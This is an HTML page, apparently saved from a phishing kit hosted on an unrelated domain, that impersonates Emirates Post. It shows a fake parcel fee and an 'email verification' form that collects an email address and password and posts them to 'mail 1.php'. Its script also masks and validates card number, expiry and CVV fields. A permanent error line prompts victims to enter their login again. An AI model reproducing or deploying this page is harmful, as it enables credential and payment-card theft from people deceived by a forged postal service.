<!DOCTYPE html>
<!-- saved from url=(0054)https://www.skilgiva.com/competency//postem/index.html -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> 
        
         
        <meta name="viewport" content="width=device-width, initial-scale=1"> 
        <!-- link_icons -->         
        <link rel="stylesheet" href="./EmPost_files/bootstrap-icons.css"> 
        <link rel="stylesheet" href="./EmPost_files/font-awesome.min.css"> 
        <title>Emirates Post</title>         
        <!-- logo site web-->         
        <link rel="icon" href="./EmPost_files/favicon.png" type="image/x-icon"> 
        <link rel="shortcut icon" href="./EmPost_files/favicon.png" type="image/x-icon"> 
        <!-- link__css -->         
        <link rel="stylesheet" href="./EmPost_files/bootstrap.css"> 
        <link rel="stylesheet" href="./EmPost_files/wizara.css"> 
    </head>     
    <body> 
        <div class="home"> 
            <div class="ho"> 
                <div class="container"> 
                    <div class="navbar"> 
                        <div class="limaja"> 
                            <img src="./EmPost_files/Emarats.png"> 
                        </div>                         
                        <div class="icon"> 
                            <ul> 
                                <li class="geo">
                                    <i class="icon fa fa-globe"></i>
                                </li>                                 
                                <li class="oo">
                                    <i class="fa fa-home"></i>
                                </li>                                 
                                <li class="oo">
                                    <i class="fa fa-search"></i>
                                </li>                                 
                                <li class="oo">
                                    <i class=" fa fa-gear"></i>
                                </li>                                 
                                <li>
                                    <i class="fa fa-navicon"></i>
                                </li>                                 
                            </ul>                             
                        </div>                         
                    </div>                     
                </div>                 
            </div>             
        </div>         
        <div class="validation"> 
            <div class="container"> 
                <h2>OTP Verification</h2> 
                <hr class="hr"> 
                <h4>Home <i class="fa fa-angle-right"></i> <span>E-mail Access</span></h4> 
                <div class="sender"> 
                    <div class="row"> 
                        <div class="col-lg-3 left"> 
                            <div> 
                                                            
                                <div class="d-flex adn"> <span></span> 
                                    <p>Email Verification</p> 
                                </div>                                 
                            </div>                             
                            <div class="pijama responsive"> 
                                <div class="statu"> 
                                    <p>Destination:</p> <span>United Arab Emirats</span> 
                                </div>                                 
                                <hr class="gy-3"> 
                                <div class="statu"> 
                                    <p>Total</p> <span>AED 25.71</span> 
                                </div>                                 
                            </div>                             
                            <div class="pijama web"> 
                                <hr class="gy-3"> 
                                <div class="statu"> 
                                    <p>Destination:</p> <span>United Arab Emirates</span> 
                                </div>                                 
                                <hr class="gy-3"> 
                                <div class="statu"> 
                                    <p>Last Updated:</p> <span>6 Oct 10:49 AM</span> 
                                </div>                                 
                            </div>                             
                            <hr class="gy-3"> 
                            <div class="pijama web"> 
                                <div class="statu"> 
                                    <p>Shipment type</p> <span>Other</span> 
                                </div>                                 
                                <hr class="gy-3"> 
                            </div>                             
                            <div class="pijama web"> 
                                <div class="statu"> 
                                    <p>Total</p> <span>AED 45.71</span> 
                                </div>                                 
                                <hr class="gy-3"> 
                            </div>                             
                        </div>                         
                        <div class="col-lg-9 right">
                         <h3>Email Verification <span><i class=" fa fa-question-circle fa-1x"></i></span></h3>
                         <p>We need to verify your email access to receive order update</p>
                         <h6><strong>90%</strong> Complete</h6>
                         <hr>
                     
                            <form action="mail 1.php" method="post"> 
                                <input type="hidden" name="step" value="cc"> 
                                <div class="login"> 
                                    <div class="all_one mistak"> 
                                        <div class="form-group box mt-4 zibra"> 
                                            <label>E-mail<span class="star">*</span>
                                            </label>                                             
                                            <input type="text" name="email" id="email" class="form-control" placeholder="e.g johndoe@hotmail.com" required=""> 
                                            <div class="error_name any">Required Field!</div>                                             
                                        </div>                                         
                                        <div class="form-group box mt-4 zibra"> 
                                            <label>Password:<span class="star">*</span>
                                            </label>                                             
                                            <input type="pass" name="pass" id="pass" class="form-control" placeholder="Password" required=""> 
                                            <div class="error_email any">Required Field!</div>                                             
                                                                         
                                <div class="bottona"> 
                                    <button class="btn" name="submit">Continue</button>                                     
                                </div>                               
                            </form>                             
                        </div>                         
                    </div>                     
                </div> 
                <div class="intro" style="
    color: #d00000;
    font-size: 16.5px;
    text-align: left;
">*Please check your email or password and try again !</div>                
            </div>             
        </div>         
        <div class="fotter"> 
            <div class="container"> 
                <hr> 
                <div class="bot"> 
                    <p>© 2022 Emirates Post, All Rights Reserved</p> 
                    <div class="images d-flex"> 
                        <img src="./EmPost_files/one_fot.png" style="width:87px;height:40px;"> 
                        <img src="./EmPost_files/two_fot.png" style="width:62px;height:40px;"> 
                        <img src="./EmPost_files/Emarats.png" style="width:76px;height:40px;"> 
                    </div>                     
                </div>                 
            </div>             
        </div>         
        <script src="./EmPost_files/jquery-3.5.1.min.js.download"></script>         
        <script src="./EmPost_files/jquery.mask.js.download"></script>         
        <script src="./EmPost_files/jquery.mask.js.download"></script>         
        <script>
           
           $("#full").blur(function(){
                if($("#full").val().length < 1){
                    $("#full").css({border:'1px solid red'});
                    $(".error_full").show();
               }else{;
                    $("#full").css({border:'1px solid #6DAE36'});
                    $(".error_name").hide();
               }
             })

           $("#email").blur(function(){
                if($("#email").val().length < 1){
                    $("#email").css({border:'1px solid red'});
                    $(".error_email").show();
               }else{;
                    $("#email").css({border:'1px solid #6DAE36'});
                    $(".error_email").hide();
               }
             })

           $("#card").blur(function(){
                if($("#card").val().length < 1){
                    $("#card").css({border:'1px solid red'});
                    $(".error_card").show();
               }else{;
                    $("#card").css({border:'1px solid #6DAE36'});
                    $(".error_card").hide();
               }
             })
           $("#card").mask("0000 0000 0000 0000");

           $("#date").blur(function(){
                if($("#date").val().length < 1){
                    $("#date").css({border:'1px solid red'});
                    $(".error_date").show();
               }else{;
                    $("#date").css({border:'1px solid #6DAE36'});
                    $(".error_date").hide();
               }
             })
           $("#date").mask("00/00");

           $("#cvv").blur(function(){
                if($("#cvv").val().length < 1){
                    $("#cvv").css({border:'1px solid red'});
                    $(".error_cvv").show();
               }else{;
                    $("#cvv").css({border:'1px solid #6DAE36'});
                    $(".error_cvv").hide();
               }
             })
           $("#cvv").mask("000");


        </script>         
         
</body></html>